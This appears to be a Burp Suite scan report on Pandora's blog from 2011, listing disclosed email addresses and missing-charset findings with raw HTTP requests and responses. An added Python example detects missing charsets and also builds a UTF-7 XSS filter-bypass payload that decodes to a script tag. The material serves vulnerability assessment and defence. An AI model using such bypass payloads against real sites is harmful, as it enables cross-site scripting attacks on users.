<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p>Please RSVP by sending us an email to event@pandora.com with BBQ in the subject line. Make sure to let us know if you plan to bring a guest--more the merrier! Full details below: </p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with SANTA MONICA in the subject line.</p> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <a href="http://">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <strong>tim.westergren@pandora.com</strong> ...[SNIP]... <p>Over the course of the last 8 weeks we've been introduced to an incredible group of Pandora listeners from all over the world. Whether it's been here in the Pandora blog comments, via pandora-support@pandora.com, or out there in the blogosphere we've virtually "met" an amazing and passionate group of music lovers.</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/colorado/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT
ETag: "7cc4f1-596e-49881a27ac2c0"
Accept-Ranges: bytes
Content-Length: 22894
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p> We're having Pandora town-halls in Denver and Atlanta next week. If you're in one of those cities and haven't gotten your email invite, send a note to 'tour@pandora.com' and we'll put you on the list.</p> ...[SNIP]... you'll come and hang and chat for an hour and a bit, that's usually how long the town halls last. And if you're in another city and think it is time we had a town hall there, let us know by emailing 'tour@pandora.com,' and we'll add it to the list!</p> ...[SNIP]... </strong>: Send email to tour@pandora.com with number of guests<br /> ...[SNIP]... </strong> Send email to tour@pandora.com with number of guests<br /> ...[SNIP]... <br /> RSVP: tour@pandora.com</p> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/georgia/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:27 GMT
ETag: "7cc5de-5b9d-49881a23db9c0"
Accept-Ranges: bytes
Content-Length: 23453
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p> We're having Pandora town-halls in Denver and Atlanta next week. If you're in one of those cities and haven't gotten your email invite, send a note to 'tour@pandora.com' and we'll put you on the list.</p> ...[SNIP]... you'll come and hang and chat for an hour and a bit, that's usually how long the town halls last. And if you're in another city and think it is time we had a town hall there, let us know by emailing 'tour@pandora.com,' and we'll add it to the list!</p> ...[SNIP]... </strong>: Send email to tour@pandora.com with number of guests<br /> ...[SNIP]... </strong> Send email to tour@pandora.com with number of guests<br /> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
The following email addresses were disclosed in the response:
timinny@pandora.com
tour@pandora.com
Request
GET /pandora/archives/new-york/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:45 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:29 GMT
ETag: "410001-82b3-49881a25c3e40"
Accept-Ranges: bytes
Content-Length: 33459
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with "NEW YORK" in the subject line.</p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with SYRACUSE in the subject line.</p> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <strong>timinny@pandora.com</strong> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/north-carolina/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:45 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:27 GMT
ETag: "408001-48e2-49881a23db9c0"
Accept-Ranges: bytes
Content-Length: 18658
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... the various meetings and talks. I left town energized and armed with a bunch of great new ideas. I've posted some pix and thoughts below... if you have any you'd like me to add, please send 'em in - tour@pandora.com</p> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/pennsylvania/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:49 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT
ETag: "7cc3b0-5fee-49881a27ac2c0"
Accept-Ranges: bytes
Content-Length: 24558
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with "PHILADELPHIA" in the subject line.</p> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/texas/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:55 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:28 GMT
ETag: "7cc3a8-8e62-49881a24cfc00"
Accept-Ranges: bytes
Content-Length: 36450
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with DALLAS in the subject line.</p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with AUSTIN in the subject line.</p> ...[SNIP]... <a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/virginia/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:58 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:28 GMT
ETag: "7cc4df-5ed2-49881a24cfc00"
Accept-Ranges: bytes
Content-Length: 24274
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com </a> ...[SNIP]... the various meetings and talks. I left town energized and armed with a bunch of great new ideas. I've posted some pix and thoughts below... if you have any you'd like me to add, please send 'em in - tour@pandora.com</p> ...[SNIP]... <strong>tour@pandora.com</strong> ...[SNIP]... <a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/washington-dc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:28 GMT
ETag: "7ce1d4-4d1d-49881a24cfc00"
Accept-Ranges: bytes
Content-Length: 19741
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p>Please RSVP by sending an email to tour@pandora.com with DC in the subject line. Hope to see you there!</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/index.xml HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:03:45 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:55:55 GMT
ETag: "79e602-8883-4990aa80d28c0"
Accept-Ranges: bytes
Content-Length: 34947
Connection: close
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?> <rss version="2.0"> <channel> <title>Pandora</title> <link>http://blog.pandora.com/pandora/</link> <description></description> <language>en</language> <copyright ...[SNIP]... een (any recommendations you have about cool places to stop and stretch legs or get a cup of coffee or a great meal between Grand Forks and Sioux Falls or Sioux Falls and Omaha, please let us know at tour@pandora.com). The response from the local audience has been wonderful, although no one has yet offered to make sure there's no snow...</p> ...[SNIP]... <p>So if you have friends you think might want to drop in, point them to the info below and ask them to email us at tour@pandora.com to RSVP. Not everyone on Pandora opts in to get emails so we always miss people that we wish we could reach. </p> ...[SNIP]... <p> We're having Pandora town-halls in Denver and Atlanta next week. If you're in one of those cities and haven't gotten your email invite, send a note to 'tour@pandora.com' and we'll put you on the list.</p> ...[SNIP]... you'll come and hang and chat for an hour and a bit, that's usually how long the town halls last. And if you're in another city and think it is time we had a town hall there, let us know by emailing 'tour@pandora.com,' and we'll add it to the list!</p> ...[SNIP]... </strong>: Send email to tour@pandora.com with number of guests<br /> ...[SNIP]... </strong> Send email to tour@pandora.com with number of guests<br /> ...[SNIP]...
The following email address was disclosed in the response:
brandon.aaron@gmail.com
Request
GET /pandora/jquery.dimension.js HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:23:48 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 23 May 2007 04:44:32 GMT
ETag: "5cc023-25da-4311bd27b0c00"
Accept-Ranges: bytes
Content-Length: 9690
Content-Type: application/javascript
/* * Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) * and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses. * * $LastChangedDate$ * $Rev$ */ ...[SNIP]... the chain. If passed in the * chain will not be broken and the result will be assigned to this object. * @type Object * @cat Plugins/Dimensions * @author Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net) */ jQuery.fn.offset = function(options, returnObject) { var x = 0, y = 0, elem = this[0], parent = this[0], sl = 0, st = 0, options = jQuery.extend({ margin: true, border ...[SNIP]...
5. HTML does not specify charset
There are 4 instances of this issue:
If a web response states that it contains HTML content but does not specify a character set, the browser has to guess one. It first prescans the start of the document (the first 1024 bytes) for a meta charset declaration and, failing that, sniffs the content. Even if the bulk of the HTML is in a standard encoding such as UTF-8, byte sequences characteristic of another encoding anywhere in the response can cause the browser to decode the whole document using that other encoding. This can have unexpected results and can lead to cross-site scripting: a value which contains no literal angle brackets, and therefore passes the application's output filters, becomes markup once the browser decodes it differently. The classic case is UTF-7, where the byte string +ADw-script+AD4- decodes to <script>. Current browsers no longer auto-detect UTF-7, so that specific bypass is largely historical, but confusion between other encodings remains possible and the remediation costs nothing.
In most cases, the absence of a charset directive does not constitute a security flaw in itself, particularly if the response contains only static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists. Note that the instances listed below are Apache's default 404 pages, whose only dynamic content is the requested path echoed into the body, so the question to answer is whether that echo can be combined with a charset confusion.
Issue remediation
For every response containing HTML content, the application should include within the Content-Type header a directive specifying a standard recognised character set which matches the encoding the content is actually written in, for example Content-Type: text/html; charset=UTF-8. A meta charset declaration in the first 1024 bytes of the document is an acceptable supplement but should not be the only declaration. Server-generated responses such as the Apache error documents below never pass through the application, so the fix for those belongs in the web server configuration: in Apache, AddDefaultCharset UTF-8 adds a charset parameter to text/plain and text/html responses which do not already carry one.
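The following is an added example, not part of the Burp report or of the scanned site. It does two things: it implements the check this issue describes (is the response text/html, and does neither the Content-Type header nor a meta tag in the first 1024 bytes declare a charset?), and it shows the mechanism behind the UTF-7 warning by hand-building the RFC 2152 shift sequence for angle brackets and confirming that it passes a bracket-stripping filter yet decodes to <script>. The sample headers and body are constructed to mirror the Apache 404 response shown in the instances below; the function and variable names are the example's own.

```python
"""Added example: detect 'HTML does not specify charset' and show why it
matters via a hand-built UTF-7 payload. Sample data is constructed, modelled
on the Apache 404 in the report (body truncated)."""
import base64
import re

# Constructed sample response, modelled on the report's 404 instance.
SAMPLE_HEADERS = {
    "Server": "Apache/2.2.9 (Debian)",
    "Content-Type": "text/html",
    "Content-Length": "313",
}
SAMPLE_BODY = (
    b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    b"<html><head>\n<title>404 Not Found</title>\n</head><body>\n"
    b"<h1>Not Found</h1>\n"
)

_HEADER_CHARSET = re.compile(r";\s*charset\s*=\s*\"?([\w.:-]+)", re.I)
_META_CHARSET = re.compile(r"<meta[^>]+charset\s*=\s*[\"']?\s*([\w.:-]+)", re.I)


def header_charset(content_type):
    """charset parameter of a Content-Type value, lower-cased, or None."""
    m = _HEADER_CHARSET.search(content_type or "")
    return m.group(1).lower() if m else None


def meta_charset(body):
    """charset declared by <meta charset=...> or http-equiv, or None.

    Only the first 1024 bytes are examined: that is the prescan window a
    browser uses before it falls back to sniffing the content."""
    head = body[:1024].decode("ascii", errors="ignore")
    m = _META_CHARSET.search(head)
    return m.group(1).lower() if m else None


def html_without_charset(headers, body):
    """True when the response is text/html and declares no charset anywhere.

    Header names are compared case-insensitively, as HTTP requires."""
    ct = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    if ct.split(";", 1)[0].strip().lower() != "text/html":
        return False  # not HTML (e.g. application/xml): out of scope
    return header_charset(ct) is None and meta_charset(body) is None


def utf7_shift(text):
    """RFC 2152 shift sequence for text: '+' + base64(UTF-16BE) + '-'.

    Built by hand because Python's own utf-7 encoder leaves '<' and '>'
    unencoded (they belong to RFC 2152's optional direct set)."""
    b64 = base64.b64encode(text.encode("utf-16-be")).decode("ascii")
    return "+" + b64.rstrip("=") + "-"


def naive_bracket_filter(value):
    """The kind of output filter UTF-7 smuggling defeats: accepts anything
    without a literal angle bracket."""
    return "<" not in value and ">" not in value


def utf7_bypass_payload(tag):
    """Wrap tag so the brackets only appear after UTF-7 decoding,
    e.g. 'script' -> '+ADw-script+AD4-'."""
    return utf7_shift("<") + tag + utf7_shift(">")


if __name__ == "__main__":
    print("missing charset:", html_without_charset(SAMPLE_HEADERS, SAMPLE_BODY))
    payload = utf7_bypass_payload("script")
    print("payload:", payload, "passes filter:", naive_bracket_filter(payload))
    print("decoded as UTF-7:", payload.encode("ascii").decode("utf-7"))
```

Run against a real capture by filling headers and body from the proxy log; the check reports a finding only for text/html responses, so the application/xml and application/javascript responses earlier in this report are correctly ignored. The decode step at the end uses Python's standard UTF-7 decoder, which is enough to show that a browser choosing UTF-7 for the page would see real markup where the filter saw none.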
Request
GET /pandora/assets_c/2010/11/North HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:06 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 313
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/North was not found on thi ...[SNIP]...
Request
GET /pandora/assets_c/2010/11/sd HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 310
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/sd was not found on this s ...[SNIP]...